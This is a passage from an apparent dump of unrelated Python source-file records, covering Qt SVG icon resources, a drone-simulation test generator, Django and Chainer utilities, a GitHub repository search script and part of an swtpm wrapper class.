<defs\\x0a id=\\\n\\x22defs10\\x22 />\\x0a <s\\\nodipodi:namedvie\\\nw\\x0a pagecolor\\\n=\\x22#ffffff\\x22\\x0a \\\nbordercolor=\\x22#66\\\n6666\\x22\\x0a borde\\\nropacity=\\x221\\x22\\x0a \\\n objecttoleranc\\\ne=\\x2210\\x22\\x0a grid\\\ntolerance=\\x2210\\x22\\x0a \\\n guidetoleran\\\nce=\\x2210\\x22\\x0a ink\\\nscape:pageopacit\\\ny=\\x220\\x22\\x0a inksc\\\nape:pageshadow=\\x22\\\n2\\x22\\x0a inkscape\\\n:window-width=\\x221\\\n339\\x22\\x0a inksca\\\npe:window-height\\\n=\\x22532\\x22\\x0a id=\\x22\\\nnamedview8\\x22\\x0a \\\n showgrid=\\x22false\\\n\\x22\\x0a inkscape:\\\nzoom=\\x220.77929688\\\n\\x22\\x0a inkscape:\\\ncx=\\x22175.60373\\x22\\x0a \\\n inkscape:cy=\\\n\\x22124.56147\\x22\\x0a \\\n inkscape:window\\\n-x=\\x22340\\x22\\x0a in\\\nkscape:window-y=\\\n\\x22401\\x22\\x0a inksc\\\nape:window-maxim\\\nized=\\x220\\x22\\x0a in\\\nkscape:current-l\\\nayer=\\x22svg6\\x22 />\\x0a \\\n <path\\x0a d=\\x22M\\\n0 0h48v48h-48z\\x22\\x0a\\\n id=\\x22path2\\x22\\x0a\\\n fill=\\x22none\\x22\\\n />\\x0a <circle\\x0a \\\n style=\\x22opacit\\\ny:1;fill:#999999\\\n;fill-opacity:1;\\\nstroke:none;stro\\\nke-width:17.2242\\\n9085;stroke-line\\\ncap:round;stroke\\\n-linejoin:bevel;\\\nstroke-miterlimi\\\nt:4;stroke-dasha\\\nrray:none;stroke\\\n-dashoffset:0;st\\\nroke-opacity:1;p\\\naint-order:norma\\\nl\\x22\\x0a id=\\x22path\\\n1093\\x22\\x0a cx=\\x221\\\n8.237631\\x22\\x0a c\\\ny=\\x2217.875154\\x22\\x0a \\\n r=\\x2214.588048\\x22\\\n />\\x0a <path\\x0a \\\n style=\\x22fill:#b3\\\nb3b3;fill-rule:e\\\nvenodd;stroke:#9\\\n99999;stroke-wid\\\nth:7;stroke-line\\\ncap:round;stroke\\\n-linejoin:miter;\\\nstroke-miterlimi\\\nt:4;stroke-dasha\\\nrray:none;stroke\\\n-opacity:1\\x22\\x0a \\\n d=\\x22M 23.461607,\\\n23.808476 40.458\\\n238,41.43075\\x22\\x0a \\\n id=\\x22path1095\\x22\\\n\\x0a inkscape:c\\\nonnector-curvatu\\\nre=\\x220\\x22\\x0a sodi\\\npodi:nodetypes=\\x22\\\ncc\\x22 />\\x0a <circle\\\n\\x0a style=\\x22opa\\\ncity:1;fill:#e6e\\\n6e6;fill-opacity\\\n:1;stroke:none;s\\\ntroke-width:15.3\\\n1822777;stroke-l\\\ninecap:round;str\\\noke-linejoin:bev\\\nel;stroke-miterl\\\nimit:4;stroke-da\\\nsharray:none;str\\\noke-dashoffset:0\\\n;stroke-opacity:\\\n1;paint-order:no\\\nrmal\\x22\\x0a id=\\x22p\\\nath1093-3\\x22\\x0a \\\ncx=\\x2218.156338\\x22\\x0a \\\n cy=\\x2217.84371\\\n2\\x22\\x0a r=\\x2212.97\\\n3715\\x22 />\\x0a <g\\x0a \\\n style=\\x22stroke\\\n:#37c8ab;stroke-\\\nlinecap:round;st\\\nroke-opacity:1\\x22\\x0a\\\n id=\\x22g831\\x22\\x0a \\\n transform=\\x22m\\\natrix(0.19150521\\\n,0,0,0.19150521,\\\n-0.1999896,-0.45\\\n681928)\\x22>\\x0a <p\\\nath\\x0a style\\\n=\\x22fill:none;fill\\\n-rule:evenodd;st\\\nroke:#37c8ab;str\\\noke-width:16;str\\\noke-linecap:roun\\\nd;stroke-linejoi\\\nn:miter;stroke-m\\\niterlimit:4;stro\\\nke-dasharray:non\\\ne;stroke-opacity\\\n:1\\x22\\x0a d=\\x22m \\\n95.091973,56.172\\\n243 0.09447,79.7\\\n95097\\x22\\x0a id\\\n=\\x22path812\\x22\\x0a \\\n inkscape:conne\\\nctor-curvature=\\x22\\\n0\\x22\\x0a sodipo\\\ndi:nodetypes=\\x22cc\\\n\\x22 />\\x0a <path\\x0a \\\n style=\\x22fil\\\nl:none;fill-rule\\\n:evenodd;stroke:\\\n#37c8ab;stroke-w\\\nidth:16;stroke-l\\\ninecap:round;str\\\noke-linejoin:mit\\\ner;stroke-miterl\\\nimit:4;stroke-da\\\nsharray:none;str\\\noke-opacity:1\\x22\\x0a \\\n d=\\x22m 134.9\\\n6147,95.594487 -\\\n79.795108,0.0945\\\n\\x22\\x0a id=\\x22pat\\\nh812-3\\x22\\x0a i\\\nnkscape:connecto\\\nr-curvature=\\x220\\x22\\x0a\\\n sodipodi:\\\nnodetypes=\\x22cc\\x22 /\\\n>\\x0a </g>\\x0a</svg>\\x0a\\\n\\\n\"\n\nqt_resource_name = b\"\\\n\\x00\\x05\\\n\\x00o\\xa6S\\\n\\x00i\\\n\\x00c\\x00o\\x00n\\x00s\\\n\\x00\\x10\\\n\\x0e\\xa2zG\\\n\\x00z\\\n\\x00o\\x00o\\x00m\\x00_\\x00d\\x00e\\x00f\\x00a\\x00u\\x00l\\x00t\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x09\\\n\\x0c\\xb6\\xa9\\xc7\\\n\\x00s\\\n\\x00a\\x00v\\x00e\\x00c\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0f\\\n\\x0b7\\x0bg\\\n\\x00m\\\n\\x00a\\x00p\\x00 \\x00(\\x00n\\x00i\\x00g\\x00h\\x00t\\x00)\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0c\\\n\\x06\\xeb\\x9c'\\\n\\x00z\\\n\\x00o\\x00o\\x00m\\x00_\\x00o\\x00u\\x00t\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x07\\\n\\x03\\x83Z'\\\n\\x00m\\\n\\x00a\\x00p\\x00.\\x00s\\x00v\\x00g\\\n\\x00\\x0b\\\n\\x05\\x03\\x96\\xa7\\\n\\x00z\\\n\\x00o\\x00o\\x00m\\x00_\\x00i\\x00n\\x00.\\x00s\\x00v\\x00g\\\n\"\n\nqt_resource_struct = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x02\\xd8\\xa5\\\n\\x00\\x00\\x00\\xa4\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x07\\xbd\\x15\\\n\\x00\\x00\\x00r\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x02\\xcd\\x02\\\n\\x00\\x00\\x00N\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x18y\\\n\\x00\\x00\\x006\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x10\\xd1\\\n\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\"\n\ndef qInitResources():\n QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n"} {"ext": "py", "sha": "1a313097295e5d2b5e64ec97ffdbc0634712a8db", "content": "# pylint: disable=unused-import\n\ntry:\n import json\nexcept ImportError:\n try:\n import simplejson as json\n except ImportError as ie:\n raise ImportError(\n 'No json library installed.'\n ' Try running `pip install simplejson` to install a compatible json library.'\n ) from ie\n"} {"ext": "py", "sha": "1a3131e465579d8b854f24dd4633a3d07fe8600b", "content": "\"\"\"Define mapping of litex components to generated zephyr output\"\"\"\n\n\nclass Mapping:\n \"\"\"Mapping from litex component to generated zephyr output\n\n :param name: Name of the mapping, only used during debugging\n :type name: str\n \"\"\"\n\n def __init__(self, name):\n self.name = name\n"} {"ext": "py", "sha": "1a31324f25e519d75abd088f1d1fb58983c3cab4", "content": "\"\"\"\nWe introduce some useful functions to print attributes of target object.\n\"\"\"\nimport sys\nimport functools\nimport itertools\n\n__all__ = ['display', 'camel_attr_print', 'trace']\n\ndef trace(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n result = func(*args, **kwargs)\n print('%s(%r, %r) -> %r' % (func.__name__, args, kwargs, result))\n return result\n\n return wrapper\n\n\ndef _decorator_write_to_file(file):\n def wrapper(func):\n if not _validate_file_object(file):\n print(\"File doesn't have write() method. Print to sys.stdout\\n\")\n return func\n else:\n @functools.wraps(func)\n def nfunc(*args, **kwargs):\n return func(*args, file=file, **kwargs)\n\n return nfunc\n\n return wrapper\n\n\ndef _validate_file_object(file):\n if not hasattr(file, 'write'):\n return False\n return True\n\n\ndef display(obj, tp, *args, file=sys.stdout, **kwargs):\n \"\"\"\n :param obj: specify your input object. It can be anything available in Python.\n :param tp: specify the type of what you want to print. It can be 'state', 'attr', 'func', 'item'.\n :param file: print the output to the file. the file must have write() method.\n\n >>>import numpy as np\n >>>display(np, 'attr', 'array')\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n attribute name: array\n attribute: <built-in function array>\n >>>display(np, 'func', 'array', [313])\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n function: array\n function in: ([313],) {}\n function return: [313]\n >>>display('1 in [1,32,4]', 'state')\n statement: 1 in [1,32,4]\n return: True\n >>>display('1 in a', 'state', {'a':[1,2,3,4]})\n statement: 1 in a\n return: True\n >>>display([1,3,23], 'item', 0)\n object: [1, 3, 23]\n item sequence: (0,)\n item return: 1\n >>>display([[23,424],3,23], 'item', 0, 1)\n object: [[23, 424], 3, 23]\n item sequence: (0, 1)\n item return: 424\n \"\"\"\n if file != sys.stdout:\n mprint = _decorator_write_to_file(file)(print)\n else:\n mprint = print\n if tp == 'item':\n _display_item(obj, *args, mprint=mprint)\n elif tp == 'attr':\n _display_attr(obj, *args, mprint=mprint)\n elif tp == 'func':\n _display_func(obj, *args, mprint=mprint, **kwargs)\n elif tp == 'state':\n _display_state(obj, *args, mprint=mprint)\n else:\n print('Sorry, please choose a type \"item\", \"attr\", \"func\", \"state\"')\n\n\ndef camel_attr_print(obj, file=sys.stdout):\n \"\"\"\n :param obj: specify your input object. It can be anything available in Python.\n :param file: print the output to the file. the file must have write() method.\n\n >>>import numpy as np\n >>>camel_attr_print(np)\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n attribute name: __NUMPY_SETUP__\n attribute: False\n\n object: <module 'numpy' from 'D:\\\\ProgramData\\\\Anaconda3\\\\lib\\\\site-packages\\\\numpy\\\\__init__.py'>\n attribute name: __all__\n ...\n \"\"\"\n if not _validate_file_object(file):\n print(\"File doesn't have write() method. Print to sys.stdout\\n\")\n file = sys.stdout\n i = itertools.filterfalse(_find_not_camel, dir(obj))\n display(obj, 'attr', *i, file=file)\n\n\ndef _find_not_camel(s):\n if s.startswith('__') and s not in ('__doc__', '__builtins__'):\n return False\n else:\n return True\n\n\ndef _display_attr(obj, *attrs, mprint=print):\n mprint('object:', obj)\n for attr in attrs:\n mprint('attribute name:', attr)\n attr = getattr(obj, attr)\n mprint('attribute:', attr)\n mprint('')\n\n\ndef _display_func(obj, func, *args, mprint=print, **kwargs):\n mprint('object:', obj)\n mprint('function:', func)\n attr = getattr(obj, func)\n mprint('function in:', args, kwargs)\n mprint('function return:', attr(*args, **kwargs))\n mprint('')\n\n\ndef _display_item(obj, *items, mprint=print):\n mprint('object:', obj)\n mprint('item sequence:', items)\n r = obj\n for item in items:\n r = r[item]\n mprint('item return:', r)\n mprint('')\n\n\ndef _display_state(statement, *args, mprint=print):\n mprint('statement:', statement)\n mprint('return:', eval(statement, *args))\n mprint('')\n"} {"ext": "py", "sha": "1a3132fb9d9999df45804cb13b6a7594d0adf92a", "content": "#!/usr/bin/env python3\n#\n# Synthesis-based resolution of features/enforcers interactions in CPS\n# Copyright 2020 Carnegie Mellon University.\n# NO WARRANTY. THIS CARNEGIE MELLON UNIVERSITY AND SOFTWARE ENGINEERING\n# INSTITUTE MATERIAL IS FURNISHED ON AN \"AS-IS\" BASIS. CARNEGIE MELLON\n# UNIVERSITY MAKES NO WARRANTIES OF ANY KIND, EITHER EXPRESSED OR IMPLIED,\n# AS TO ANY MATTER INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR\n# PURPOSE OR MERCHANTABILITY, EXCLUSIVITY, OR RESULTS OBTAINED FROM USE OF\n# THE MATERIAL. CARNEGIE MELLON UNIVERSITY DOES NOT MAKE ANY WARRANTY OF ANY\n# KIND WITH RESPECT TO FREEDOM FROM PATENT, TRADEMARK, OR COPYRIGHT\n# INFRINGEMENT.\n# Released under a BSD (SEI)-style license, please see license.txt or contact\n# permission@sei.cmu.edu for full terms.\n# [DISTRIBUTION STATEMENT A] This material has been approved for public\n# release and unlimited distribution. Please see Copyright notice for\n# non-US Government use and distribution.\n# This Software includes and/or makes use of the following Third-Party Software\n# subject to its own license:\n# 1. JsonCpp\n# (https://github.com/open-source-parsers/jsoncpp/blob/master/LICENSE)\n# Copyright 2010 Baptiste Lepilleur and The JsonCpp Authors.\n# DM20-0762\n#\n\nimport sys\nimport os\nimport numpy as np\nimport pathlib\nimport itertools\nimport random\nimport json\n\n# Assume ego starts 0,0 always\n# Just relative to ego at varying distances\nenemy_start_positions = [\n '5,5',\n '5,0',\n '0,5',\n '-5,5',\n '5,-5',\n '-5,-5',\n '-5,0',\n '0,-5',\n\n '1,1',\n '1,0',\n '0,1',\n '-1,1',\n '1,-1',\n '-1,-1',\n '-1,0',\n '0,-1',\n\n '10,10',\n '10,0',\n '0,10',\n '-10,10',\n '10,-10',\n '-10,-10',\n '-10,0',\n '0,-10',\n ]\n \n# Config values that will be changed\nconfig_vals = {\n 'ENEMY_DRONE_SPEED' : [x for x in np.arange(1.2, 2.1, 0.1)],\n 'WAYPOINT_SEED' : [x for x in range(0, 999)], # Kinda dumb way to do this space-wise but it's fine\n 'BOUNDARY_SIZE' : [x for x in np.arange(10, 30, 1)],\n # 'SUGGEST_ACTION_RANGE' : [0,1]\n}\n\n# FLIGHT_WEIGHT stays constant\nweight_vals = [\n # Equal weights\n {'BOUNDARY_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 1, 'MISSILE_WEIGHT' : 1},\n\n # 1 : 1.5 : 2\n {'BOUNDARY_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 1.5,'MISSILE_WEIGHT' : 2},\n {'BOUNDARY_WEIGHT' : 1,'MISSILE_WEIGHT' : 1.5,'RUNAWAY_WEIGHT' : 2},\n \n {'RUNAWAY_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 1.5,'MISSILE_WEIGHT' : 2},\n {'RUNAWAY_WEIGHT' : 1,'MISSILE_WEIGHT' : 1.5,'BOUNDARY_WEIGHT' : 2},\n\n {'MISSILE_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 1.5,'BOUNDARY_WEIGHT' : 2},\n {'MISSILE_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 1.5,'RUNAWAY_WEIGHT' : 2},\n\n # 1 : 2 : 3\n {'BOUNDARY_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 2,'MISSILE_WEIGHT' : 3},\n {'BOUNDARY_WEIGHT' : 1,'MISSILE_WEIGHT' : 2,'RUNAWAY_WEIGHT' : 3},\n \n {'RUNAWAY_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 2,'MISSILE_WEIGHT' : 3},\n {'RUNAWAY_WEIGHT' : 1,'MISSILE_WEIGHT' : 2,'BOUNDARY_WEIGHT' : 3},\n\n {'MISSILE_WEIGHT' : 1,'RUNAWAY_WEIGHT' : 2,'BOUNDARY_WEIGHT' : 3},\n {'MISSILE_WEIGHT' : 1,'BOUNDARY_WEIGHT' : 2,'RUNAWAY_WEIGHT' : 3},\n]\n \ndef make_config_file(base_config_file, outfile, vals):\n # Open input and output file\n with open(base_config_file, 'r') as base, open(outfile, 'w') as out:\n # Convert to list by space delim\n for line in base:\n line_lst = line.split(' ')\n \n # If this var is one we change, then write what's stored in vars\n if(line_lst[0] in vals):\n # Handle the case that it's a float differently bc annoying precision\n if isinstance(line_lst[0], np.float64):\n out.write(line_lst[0] + ' ' + '{:.2f}'.format(vals[line_lst[0]]) + '\\n')\n else:\n out.write(line_lst[0] + ' ' + str(vals[line_lst[0]]) + '\\n')\n # If this var is not one we change, write it as is\n else:\n out.write(line)\n\ndef default(o):\n if isinstance(o, np.int64): return int(o) \n raise TypeError\n\ndef make_files(config, rootdir, enemy_start_positions, num_configurations):\n newdir = ''\n\n # They're all the same at this point -- just get the vals for any coordinator\n vals = config[\"RobustnessCoordinator\"]\n \n # Get all the combinations of variable-values we have\n combinations = [dict((zip(vals.keys(), t))) for t in itertools.product(*vals.values())]\n \n sample_size = num_configurations\n \n # Get a random sample of the combinations\n comb_sample = random.sample(combinations, sample_size)\n\n # Randomly assign weights to each case\n for entry in comb_sample:\n weights = random.choice(weight_vals)\n entry.update(weights)\n\n for coordinator in config:\n try:\n newdir = rootdir+'/'+coordinator\n os.makedirs(newdir, exist_ok=True)\n except OSError:\n print(\"Failed to create directory: %s\" % newdir)\n\n i=0\n\n # Create a directory and a corresponding config file for each test case\n for entry in comb_sample:\n\n # Everything else is random so this is fine\n enemy_start_pos_str = enemy_start_positions[i%len(enemy_start_positions)]\n i = i+1\n \n # Need to add this manually bc it's not in config file params\n controlled_vars = entry.copy();\n controlled_vars[\"enemy_strt_pos\"] = enemy_start_pos_str;\n\n dirname = ''\n for name in entry:\n if isinstance(entry[name], np.float64):\n dirname+=name+'{:.2f}'.format(entry[name])+'-'\n else:\n dirname+=name+str(entry[name])+'-'\n \n # trim the hyphen off the end\n dirname = dirname[0:-1]\n \n try:\n os.makedirs(rootdir+'/'+coordinator+'/'+dirname, exist_ok=True)\n except OSError:\n print(\"Failed to create directory: %s\" % rootdir+'/'+coordinator+'/'+dirname)\n\n # Write config file\n make_config_file('./drone.cfg', rootdir+coordinator+'/'+dirname+'/'+'drone.cfg', entry)\n\n with open(rootdir+coordinator+'/'+dirname+'/'+'controlled_vars.json', 'w') as controlled_varsfile:\n json.dump(controlled_vars, controlled_varsfile, default=default)\n # Write positions\n with open(rootdir+coordinator+'/'+dirname+'/'+'enemy_start_pos', 'wb') as posfile:\n posfile.write(enemy_start_pos_str.encode('utf-8'))\n\ndef main():\n if(len(sys.argv) != 3):\n print(\"Usage: generate_tests.py <test_dir> <num_configurations>\")\n exit()\n cwd = os.getcwd()\n os.makedirs(sys.argv[1], exist_ok=True)\n num_configurations = int(sys.argv[2])\n rootdir = cwd+'/'+sys.argv[1]+'/'\n \n if((cwd.split('/'))[-1] != 'missionapp'):\n print(\"Must be in missionapp directory to use this script. Given %s\\n\" % cwd)\n print(cwd.split('/'))\n exit()\n\n base_config_file = 'drone.cfg'\n\n coordinators = ['PriorityCoordinator', 'RobustnessCoordinator', 'SynthRobustnessCoordinator']\n \n config = { coord : config_vals.copy() for coord in coordinators }\n\n make_files(config, rootdir, enemy_start_positions, num_configurations)\n \nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a313475913ca2ebb1ad14d72612228b49fbce63", "content": "def test_dummy():\n assert 1 == 1\n # this is just a dummy test\n # add meaningful tests "} {"ext": "py", "sha": "1a3135009e8a95578bfe5f70efc5e350b6a417e8", "content": "#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport sys\n\n\ndef main():\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'photo_frame.settings')\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a3137073d8f07d24e2551a07bd100679fdf6451", "content": "from time import sleep\nimport datetime\nimport getpass\nimport keyring\nimport traceback\nfrom github import Github\n\nDEBUG = False\nearliest = datetime.datetime(2012,1,1)\n \ndef getAERepos(username):\n count = 0\n try:\n\tg = Github(username, getGithubPassword(username))\n\tfor repo in g.legacy_search_repos('app engine'):\n\t count += 1\n\t try:\n\t #if repo.updated_at > earliest or repo.pushed_at > earliest:\n\t if repo.pushed_at > earliest:\n\t\ttry:\n\t\t print '{0};{1};{2};{3};{4};{5};{6};{7};{8}'.format(\n\t\t repo.name,\n\t\t repo.created_at.date(),\n\t\t repo.updated_at.date(),\n\t\t repo.pushed_at.date(),\n\t\t repo.owner.login,\n\t\t repo.language,\n\t\t repo.forks,\n\t\t repo.watchers,\n\t\t repo.description)\n\t\texcept:\n\t\t\tprint 'ERROR unable to print description of repo {0}'.format(repo.name)\n\t \tif DEBUG and count > 10: \n\t break\n\t if 'appscale' in repo.name.lower():\n\t print '\\tFound AppScale!' \n\t except:\n\t print 'ERROR1 unable to get repo'\n\t sleep(2)\n except:\n\tprint 'ERROR2 unable to get anything'\n\t\t\n \ndef printRepository(username):\n\tg = Github(username, getGithubPassword(username))\n \n\tuser = g.get_user()\n\trepositories = user.get_repos()\n \n\tfor repository in repositories:\n\t\tprint repository.name\n\t\tprintBranches(repository)\n \ndef printBranches(repository):\n\tfor branch in repository.get_branches():\n\t\tprint ' ', branch.name\n\t\ttree = branch.commit.commit.tree\n\t\tprintTree(repository, tree, ' ')\n \ndef printTree(repository, tree, indent):\n\tfor element in tree.tree:\n\t\tprint indent, element.path\n\t\tif element.type == 'tree':\n\t\t\tprintTree(repository, repository.get_git_tree(element.sha), indent + ' ')\n \ndef getGithubPassword(username):\n\tservice = 'github'\n\tpassword = keyring.get_password(service, username)\n\tif password == None:\n\t\tprint \"Enter password for user\", username\n\t\tpassword = getpass.getpass()\n\t\tkeyring.set_password(service, username, password)\n\treturn password\n \n# Pass your Github username as a parameter\n#printRepository('ckrintz')\n\n# step through the repos with keyword 'app engine'\ngetAERepos('ckrintz')\n"} {"ext": "py", "sha": "1a3137092d366e49dc9666d6765222f9382bd4cb", "content": "from chainer import cuda\nfrom chainer import function\nfrom chainer import variable\n\n\nclass _DummyFunction(function.Function):\n\n def __init__(self, grads):\n self.grads = grads\n\n def forward(self, inputs):\n xp = cuda.get_array_module(*inputs)\n return xp.array(0),\n\n def backward(self, inputs, outputs):\n return self.grads\n\n\nclass Forget(function.Function):\n\n def __init__(self, func):\n if not callable(func):\n raise TypeError('func must be callable')\n\n self.func = func\n\n def _call_func(self, xs):\n outs = self.func(*xs)\n\n if isinstance(outs, tuple):\n for i, out in enumerate(outs):\n if isinstance(out, variable.Variable):\n continue\n n = i + 1\n suffix = {1: 'st', 2: 'nd', 3: 'rd'}.get(\n n if n < 20 else n % 10, 'th')\n msg = ('{}{} element of a returned tuple is not Variable, '\n 'but is {}').format(n, suffix, type(out))\n raise RuntimeError(msg)\n elif isinstance(outs, variable.Variable):\n outs = (outs,)\n else:\n msg = ('A tuple of Variables or a Variable are expected, but {} '\n 'is returned.'.format(type(outs)))\n raise RuntimeError(msg)\n\n return outs\n\n def forward(self, inputs):\n xs = [variable.Variable(x, volatile=True) for x in inputs]\n outs = self._call_func(xs)\n return tuple(out.data for out in outs)\n\n def backward(self, inputs, grads):\n xs = [variable.Variable(x, volatile=False) for x in inputs]\n outs = self._call_func(xs)\n _DummyFunction(grads)(*outs).backward()\n return tuple(x.grad for x in xs)\n\n\ndef forget(func, *xs):\n \"\"\"Call a function without storing internal results.\n\n On a forward propagation Chainer stores all internal results of\n :class:`Function` on a computational graph as they are required on\n backward-propagation. These results consume too much memory when the\n internal results are too large. This method **forgets** such internal\n results on forward propagation, and still supports back-propagation with\n recalculation.\n\n In a forward propagation, this method calls a given function with given\n variables without creating a computational graph. That means, no internal\n results are stored. In a backward propagation this method calls the given\n function again to create a computational graph to execute back-propagation.\n\n This method reduces internal memory usage. Instead it requires more\n calculation time as it calls the function twice.\n\n .. admonition:: Example\n\n Let ``f`` be a function defined as:\n\n >>> def f(a, b):\n ... return a + b + a\n\n and, ``x`` and ``y`` be :class:`~chainer.Variable`:\n\n >>> x = chainer.Variable(np.random.uniform(-1, 1, 5).astype('f'))\n >>> y = chainer.Variable(np.random.uniform(-1, 1, 5).astype('f'))\n\n When ``z`` is calculated as ``z = f(x, y)``, its internal result\n ``x + y`` is stored in memory. Instead if you call ``f`` with\n :meth:`forget`:\n\n >>> z = F.forget(f, x, y)\n\n internal ``x + y`` is forgotten.\n\n .. note::\n\n The method does not support functions behaving randomly, such as\n :meth:`~chainer.functions.dropout` and\n :meth:`~chainer.functions.negative_sampling`. It is because first results\n of these function differ from the second one.\n\n Args:\n func (callable): A function to call. It needs to be called with\n :class:`~chainer.Variable` object(s) and to return a\n :class:`~chainer.Variable` object or a tuple of\n :class:`~chainer.Variable` objects.\n xs (~chainer.Variable): Argument variables of the function.\n\n Returns:\n ~chainer.Variable: A variable ``func`` returns. If it returns a tuple,\n the method returns a tuple too.\n\n \"\"\"\n return Forget(func)(*xs)\n"} {"ext": "py", "sha": "1a3137dba4cd2e166fcbfa7612dd486edeeb7ff7", "content": "\n\"\"\" tpm.py\n\nWrapper classes for swtpm\n\"\"\"\n\n# pylint: disable=R0902,R0913,R0914,C0302,W0703\n\n\n#\n# swtpm_setup.py\n#\n# Authors: Stefan Berger <stefanb@linux.ibm.com>\n#\n# (c) Copyright IBM Corporation 2020\n#\n\nimport os\nimport socket\nimport struct\nimport subprocess\nimport time\n\n# TPM1.2 imports\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes, hmac\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers\n\nfrom py_swtpm_setup.swtpm_utils import logit, logerr, sha1\n\nCMD_INIT = 0x2\nCMD_SHUTDOWN = 0x3\nCMD_GET_INFO = 0x12\n\nTPMLIB_INFO_TPMSPECIFICATION = 1\nTPMLIB_INFO_TPMATTRIBUTES = 2\n\n#\n# swtpm base class for TPM 1.2 and TPM 2.0\n#\nclass Swtpm:\n \"\"\" Swtpm is the base class for usage of swtpm as TPM 1.2 or TPM 2 \"\"\"\n\n def __init__(self, swtpm_exec_l, state_path, keyopt, logfile, fds_to_pass, is_tpm2=False):\n \"\"\" Class constructor\n swtpm_exec_l is a list like [\"swtpm\", \"socket\"]\n \"\"\"\n\n self.swtpm_exec_l = swtpm_exec_l\n self.state_path = state_path\n self.keyopt = keyopt\n self.logfile = logfile\n self.fds_to_pass = fds_to_pass\n self.is_tpm2 = is_tpm2\n\n self.pidfile = None\n self.swtpm_proc = None\n self.data_client_socket = None\n self.data_swtpm_socket = None\n self.ctrl_client_socket = None\n self.ctrl_swtpm_socket = None\n\n # Probe the socket domain; Linux only has socket.AF_UNIX, Cygwin AF_INET\n self.socket_domain = socket.AF_UNIX\n try:\n s1, s2 = socket.socketpair(self.socket_domain)\n s1.close()\n s2.close()\n except ValueError: # Cygwin gives a ValueError\n self.socket_domain = socket.AF_INET\n\n def start(self):\n \"\"\" The start method starts the TPM 2 \"\"\"\n\n self.pidfile = os.path.join(self.state_path, \".swtpm_setup.pidfile\")\n cmdline = self.swtpm_exec_l.copy()\n\n if self.is_tpm2:\n cmdline.extend([\"--tpm2\"])\n\n if self.keyopt:\n cmdline.extend([\"--key\", self.keyopt])\n\n cmdline.extend([\"--flags\", \"not-need-init\",\n \"--tpmstate\", \"dir=%s\" % self.state_path,\n \"--pid\", \"file=%s\" % self.pidfile])\n # cmdline.extend([\"--log\", \"file=/tmp/log,level=20\"])\n\n ctr = 0\n while ctr < 100:\n self.data_client_socket, self.data_swtpm_socket = socket.socketpair(self.socket_domain,\n socket.SOCK_STREAM)\n os.set_inheritable(self.data_swtpm_socket.fileno(), True)\n\n self.ctrl_client_socket, self.ctrl_swtpm_socket = socket.socketpair(self.socket_domain,\n socket.SOCK_STREAM)\n os.set_inheritable(self.ctrl_swtpm_socket.fileno(), True)\n\n r_cmdline = cmdline.copy()\n r_cmdline.extend([\"--server\", \"type=tcp,fd=%d\" % self.data_swtpm_socket.fileno(),\n \"--ctrl\", \"type=unixio,clientfd=%d\" %\n self.ctrl_swtpm_socket.fileno()])\n\n self.remove_pidfile()\n\n # print(\"starting swtpm: %s\\n\" % r_cmdline)\n try:\n pass_fds = [self.data_swtpm_socket.fileno(),\n self.ctrl_swtpm_socket.fileno()]\n pass_fds.extend(self.fds_to_pass)\n\n self.swtpm_proc = subprocess.Popen(r_cmdline, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT, pass_fds=pass_fds)\n except Exception as err:\n logerr(self.logfile,\n \"Failed to start swtpm %s: %s\\n\" % (\" \".join(self.swtpm_exec_l), str(err)))\n\n ctr += 1\n\n ctr2 = 0\n while True:\n # Is it still running?\n if self.swtpm_proc.poll():\n stderr = self.swtpm_proc.communicate()[0]\n print(\"TPM died? %s\\n\" % stderr)\n self.stop()\n break\n\n if os.path.exists(self.pidfile):\n print(\"TPM is listening on Unix socket.\")\n return 0\n\n ctr2 += 1\n time.sleep(0.05)\n\n if ctr2 == 40:\n self.stop()\n break\n\n return 